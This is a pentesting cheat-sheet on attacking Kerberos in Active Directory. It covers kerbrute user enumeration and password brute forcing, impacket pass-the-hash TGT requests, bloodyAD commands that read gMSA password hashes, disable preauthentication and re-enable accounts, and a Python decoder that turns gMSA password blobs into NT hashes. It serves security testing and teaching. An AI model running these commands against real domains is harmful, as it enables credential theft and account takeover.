
Kerberos Pentesting

Last modified: 2025-03-17

Kerberos is an authentication protocol used to verify the identity of a user or host. It relies on symmetric cryptography and consists of three parties: the client, the service (server), and the Key Distribution Center (KDC), which in Active Directory runs on the domain controller. The KDC listens on port 88 (TCP and UDP). Port 464 (kpasswd) is used for password changes.

Enumeration

To enumerate users automatically, you can use nmap. The krb5-enum-users script distinguishes valid from invalid principals by the KDC's error code (KDC_ERR_C_PRINCIPAL_UNKNOWN vs. KDC_ERR_PREAUTH_REQUIRED), so it does not need credentials.

nmap --script krb5-enum-users --script-args krb5-enum-users.realm='example.local' -p 88 <target-ip>

# --dc: domain controller
# -d: domain
# combos.txt: each line of the wordlist must be a "username:password" pair.
kerbrute bruteforce --dc 10.0.0.1 -d example.domain combos.txt
# User enumeration (no credentials needed; valid users are told apart by the KDC error code)
kerbrute userenum --dc 10.0.0.1 -d example.domain usernames.txt
# Brute force one user's password (failed attempts count towards the lockout policy)
kerbrute bruteuser --dc 10.0.0.1 -d example.domain passwords.txt username

AS-REP Roasting

For user accounts that do not require Kerberos preauthentication (UAC flag DONT_REQ_PREAUTH), the KDC returns an AS-REP encrypted with the user's password-derived key to anyone who asks, and that blob can be cracked offline.
Please see AS-REP Roasting.

Kerberoasting Attack

With the credentials of any domain user, we can request service tickets (TGS) for accounts that have an SPN set. The ticket is encrypted with the service account's key, so it can be cracked offline to recover that account's password.
Please see Kerberoasting Attack.

Get TGT

impacket-getTGT -dc-ip <target-ip> example.local/<username>:<password>
# or pass the hash; impacket expects LMHASH:NTHASH, the LM part may be left empty
impacket-getTGT -dc-ip <target-ip> example.local/<username> -hashes :<ntlm_hash>

# getTGT writes the ticket to <username>.ccache; point the Kerberos credential cache at it for further testing
export KRB5CCNAME=<username>.ccache

Once the TGT is in the credential cache, we can authenticate to domain services with it instead of a password (for example with the -k -no-pass options of the impacket tools) for login or further enumeration.

Get Password Hashes

# Read the current password of a Group Managed Service Account (gMSA).
# The attribute is only readable by principals listed in msDS-GroupMSAMembership
# (PrincipalsAllowedToRetrieveManagedPassword); bloodyAD decodes the binary blob and prints the NTLM hash.
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -u username -p password get object 'gMSA01$' --attr msDS-ManagedPassword
# -k: Use Kerberos authentication (reads the ticket from KRB5CCNAME)
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -k get object 'gMSA01$' --attr msDS-ManagedPassword
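To show what the tool does with the attribute, here is an added example (not bloodyAD's own code) that parses a msDS-ManagedPassword value. The value is an MSDS-MANAGEDPASSWORD_BLOB as documented in MS-ADTS: a 16-byte header (version, reserved, total length, and offsets to the current password, previous password and two 64-bit intervals in 100-nanosecond units), followed by the passwords as NUL-terminated UTF-16LE data. The NT hash is MD4 over the raw UTF-16LE bytes, which is why the decoder hashes the bytes directly rather than decoding them to text (a real gMSA password is 256 bytes of random data that need not be valid UTF-16). MD4 is implemented inline because hashlib may not expose it on OpenSSL 3 builds. The blob fed to the parser is constructed by build_sample_blob, not captured from a domain controller.

```python
"""Decode a gMSA msDS-ManagedPassword blob into the account's NT hash.

Added example; the blob layout follows MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS).
The sample blob is constructed locally by build_sample_blob().
"""
import struct

# Version(H) Reserved(H) Length(I) CurrentPasswordOffset(H) PreviousPasswordOffset(H)
# QueryPasswordIntervalOffset(H) UnchangedPasswordIntervalOffset(H) -> 16 bytes
HEADER = struct.Struct("<HHIHHHH")


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); needed because NT hashes are unsalted MD4."""
    msg = bytearray(data)
    bit_len = len(data) * 8
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)

    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z

    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    round3_order = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = list(struct.unpack("<16I", msg[off:off + 64]))
        a, b, c, d = h
        for i in range(16):                       # round 1
            a = _lrot((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, [3, 7, 11, 19][i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                       # round 2
            k = (i % 4) * 4 + i // 4
            a = _lrot((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, [3, 5, 9, 13][i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                       # round 3
            k = round3_order[i]
            a = _lrot((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, [3, 9, 11, 15][i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & 0xFFFFFFFF for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password_utf16le: bytes) -> str:
    """NT hash = MD4 of the UTF-16LE password bytes, no salt."""
    return md4(password_utf16le).hex()


def _utf16_cstring(buf: bytes, off: int) -> bytes:
    """Bytes from off up to the first 2-byte-aligned UTF-16 NUL terminator."""
    end = off
    while end + 1 < len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[off:end]


def parse_managed_password(blob: bytes) -> dict:
    """Return NT hashes of the current/previous password and the intervals in seconds."""
    version, _reserved, length, cur_off, prev_off, query_off, unch_off = HEADER.unpack_from(blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a MSDS-MANAGEDPASSWORD_BLOB")
    current = _utf16_cstring(blob, cur_off)
    previous = _utf16_cstring(blob, prev_off) if prev_off else b""
    (query_100ns,) = struct.unpack_from("<Q", blob, query_off)
    (unch_100ns,) = struct.unpack_from("<Q", blob, unch_off)
    return {
        "current_nt_hash": nt_hash(current),
        "previous_nt_hash": nt_hash(previous) if previous else None,
        "query_interval_s": query_100ns // 10_000_000,      # until the next rotation
        "unchanged_interval_s": unch_100ns // 10_000_000,   # how long the current password stays valid
    }


def build_sample_blob(current: str, previous: str = "",
                      query_100ns: int = 3_000_000_000,            # 5 minutes
                      unch_100ns: int = 25_920_000_000_000) -> bytes:  # 30 days
    """Constructed test data in the MS-ADTS layout (passwords are 8-byte aligned before the intervals)."""
    cur = current.encode("utf-16-le") + b"\x00\x00"
    prev = previous.encode("utf-16-le") + b"\x00\x00" if previous else b""
    cur_off = HEADER.size
    prev_off = cur_off + len(cur) if prev else 0
    body = cur + prev
    body += b"\x00" * ((-len(body)) % 8)
    query_off = HEADER.size + len(body)
    unch_off = query_off + 8
    length = unch_off + 8
    header = HEADER.pack(1, 0, length, cur_off, prev_off, query_off, unch_off)
    return header + body + struct.pack("<QQ", query_100ns, unch_100ns)


if __name__ == "__main__":
    print(parse_managed_password(build_sample_blob("password")))
```

The returned hash is what you would pass to impacket-getTGT -hashes or use for pass-the-hash against the gMSA; the unchanged interval tells you how long it remains valid before the DC rotates the password.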

Account Manipulation

If our user holds write access to another account (for example GenericAll, GenericWrite or WriteProperty on userAccountControl), we can change that account's configuration.

Disable Preauth

bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -u username -p password add uac <username> -f DONT_REQ_PREAUTH
# -k: With Kerberos authentication
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -k add uac <username> -f DONT_REQ_PREAUTH

If successful, the target user no longer requires preauthentication, and AS-REP Roasting can be used to obtain an AS-REP hash for that user to crack offline. Remove the flag again after testing to leave the account as it was.

Activate Accounts

If some accounts are disabled (UAC flag ACCOUNTDISABLE), we can re-enable them by clearing the flag, provided we have write access to the account.

bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -k remove uac <username> -f ACCOUNTDISABLE